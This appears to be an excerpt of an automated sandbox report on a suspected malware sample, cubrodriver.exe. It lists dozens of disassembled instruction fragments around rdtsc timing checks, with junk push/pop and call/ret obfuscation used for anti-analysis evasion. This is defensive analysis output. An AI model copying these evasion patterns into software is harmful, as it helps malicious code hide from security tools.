Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5CF357 second address: 5CF3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F01B4D45ED8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 mov bl, C2h 0x00000023 adc bh, FFFFFFEAh 0x00000026 sub dword ptr [ebp+122D1D79h], edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F01B4D45ED8h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 sub dword ptr [ebp+122D2DEEh], esi 0x0000004e push 00000000h 0x00000050 mov ebx, 30436C9Ah 0x00000055 xchg eax, esi 0x00000056 jmp 00007F01B4D45EE3h 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jc 00007F01B4D45EDCh 0x00000064 jng 00007F01B4D45ED6h 0x0000006a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5CD3BC second address: 5CD3C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5CD3C3 second address: 5CD3C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5CC331 second address: 5CC335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5CD3C9 second address: 5CD3E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jp 00007F01B4D45ED6h 0x00000012 jns 00007F01B4D45ED6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5D0382 second address: 5D0417 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8C9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F01B44E8C98h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 stc 0x00000028 mov dword ptr [ebp+122D37EAh], ebx 0x0000002e push 00000000h 0x00000030 jnl 00007F01B44E8CA2h 0x00000036 add edi, dword ptr [ebp+122D2ADAh] 0x0000003c push 00000000h 0x0000003e mov bx, 6FB1h 0x00000042 xchg eax, esi 0x00000043 js 00007F01B44E8CA4h 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jl 00007F01B44E8C96h 0x00000053 jmp 00007F01B44E8CA6h 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5D0417 second address: 5D041D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5CE4C7 second address: 5CE4FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F01B44E8C9Eh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F01B44E8C9Bh 0x00000017 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5CF573 second address: 5CF5F4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F01B4D45ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F01B4D45ED8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 mov bl, 3Ch 0x00000028 push dword ptr fs:[00000000h] 0x0000002f jmp 00007F01B4D45EE6h 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b and ebx, dword ptr [ebp+122D1B43h] 0x00000041 mov eax, dword ptr [ebp+122D1605h] 0x00000047 mov ebx, 547AEAFCh 0x0000004c push FFFFFFFFh 0x0000004e mov ebx, edx 0x00000050 or dword ptr [ebp+122D33E5h], edi 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a push ecx 0x0000005b pop ecx 0x0000005c jmp 00007F01B4D45EDAh 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5CF5F4 second address: 5CF5F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5D2408 second address: 5D2414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5D2414 second address: 5D2418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5D2418 second address: 5D241E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5D2589 second address: 5D258D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5D258D second address: 5D2603 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F01B4D45ED8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D1B43h], eax 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov ebx, dword ptr [ebp+1247D614h] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 mov bx, si 0x0000002a mov eax, dword ptr [ebp+122D0051h] 0x00000030 mov dword ptr [ebp+1244D121h], ecx 0x00000036 push FFFFFFFFh 0x00000038 push 00000000h 0x0000003a push edi 0x0000003b call 00007F01B4D45ED8h 0x00000040 pop edi 0x00000041 mov dword ptr [esp+04h], edi 0x00000045 add dword ptr [esp+04h], 0000001Dh 0x0000004d inc edi 0x0000004e push edi 0x0000004f ret 0x00000050 pop edi 0x00000051 ret 0x00000052 sbb edi, 42F68912h 0x00000058 or edi, dword ptr [ebp+122D1B34h] 0x0000005e push eax 0x0000005f jc 00007F01B4D45EE0h 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 popad 0x00000069 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5D3671 second address: 5D3677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5D3677 second address: 5D367B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5D367B second address: 5D369E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F01B44E8CA8h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5D369E second address: 5D36A3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5D9309 second address: 5D930F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5D930F second address: 5D9313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5DF5AB second address: 5DF5B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F01B44E8C96h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5DF5B5 second address: 5DF5CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EDAh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c jbe 00007F01B4D45EE8h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5DED68 second address: 5DED7C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F01B44E8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d jns 00007F01B44E8C96h 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5E2B0C second address: 5E2B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F01B4D45ED6h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5E2B21 second address: 5E2B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jg 00007F01B44E8CACh 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5E88CB second address: 5E8905 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F01B4D45EE7h 0x0000000f pushad 0x00000010 ja 00007F01B4D45ED6h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5E8905 second address: 5E890B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5E890B second address: 5E8914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5E915B second address: 5E9166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F01B44E8C96h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5E93F9 second address: 5E940B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push ecx 0x0000000a je 00007F01B4D45ED6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5E940B second address: 5E9416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5E9416 second address: 5E941C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5758F0 second address: 575903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F01B44E8C96h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 575903 second address: 57590D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F01B4D45ED6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 57590D second address: 575917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 575917 second address: 57592B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F01B4D45ED6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F01B4D45EDCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5F3BF3 second address: 5F3BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5F2A8F second address: 5F2A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5F2A95 second address: 5F2A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5F32E5 second address: 5F32EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5F32EB second address: 5F32EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5F32EF second address: 5F32F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5F32F3 second address: 5F3303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F01B44E8C9Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5F3303 second address: 5F3307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5F3307 second address: 5F3336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007F01B44E8C9Eh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push edi 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 popad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jno 00007F01B44E8C96h 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5F3336 second address: 5F333A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 573F2B second address: 573F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F01B44E8C96h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 573F38 second address: 573F52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F01B4D45ED6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F01B4D45EDBh 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B9548 second address: 5B954C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B964F second address: 5B9653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B97FD second address: 5B9801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B9801 second address: 5B980F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F01B4D45ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B980F second address: 5B9831 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B9831 second address: 5B9837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B9837 second address: 5B983E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B9900 second address: 5B9905 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B9905 second address: 5B9928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F01B44E8CA8h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B9A00 second address: 5B9A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B9A06 second address: 5B9A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B9BEB second address: 5B9C2B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F01B4D45EDCh 0x00000008 jnc 00007F01B4D45ED6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F01B4D45ED8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d push 00000004h 0x0000002f mov dword ptr [ebp+122D1AF7h], ebx 0x00000035 push eax 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B9C2B second address: 5B9C36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5B9F88 second address: 5B9FBF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F01B4D45ED8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 0000001Eh 0x00000027 mov cx, dx 0x0000002a push eax 0x0000002b pushad 0x0000002c jng 00007F01B4D45EDCh 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BA10F second address: 5BA113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BA2EE second address: 5BA37A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edx, dword ptr [ebp+122D37F3h] 0x00000013 lea eax, dword ptr [ebp+12480E77h] 0x00000019 or ecx, dword ptr [ebp+122D1E12h] 0x0000001f push eax 0x00000020 jmp 00007F01B4D45EDEh 0x00000025 mov dword ptr [esp], eax 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F01B4D45ED8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000019h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 mov dx, A281h 0x00000046 lea eax, dword ptr [ebp+12480E33h] 0x0000004c call 00007F01B4D45EE1h 0x00000051 or ecx, 6AF457FFh 0x00000057 pop ecx 0x00000058 nop 0x00000059 pushad 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5BA37A second address: 5BA39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F01B44E8CA8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F01B44E8C96h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5FC22D second address: 5FC231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5FC231 second address: 5FC23A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5FC3AF second address: 5FC3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5FC520 second address: 5FC526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5FC91C second address: 5FC921 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5FCA95 second address: 5FCA99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5FCA99 second address: 5FCA9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5FCBEC second address: 5FCBF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 5FCBF5 second address: 5FCBFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
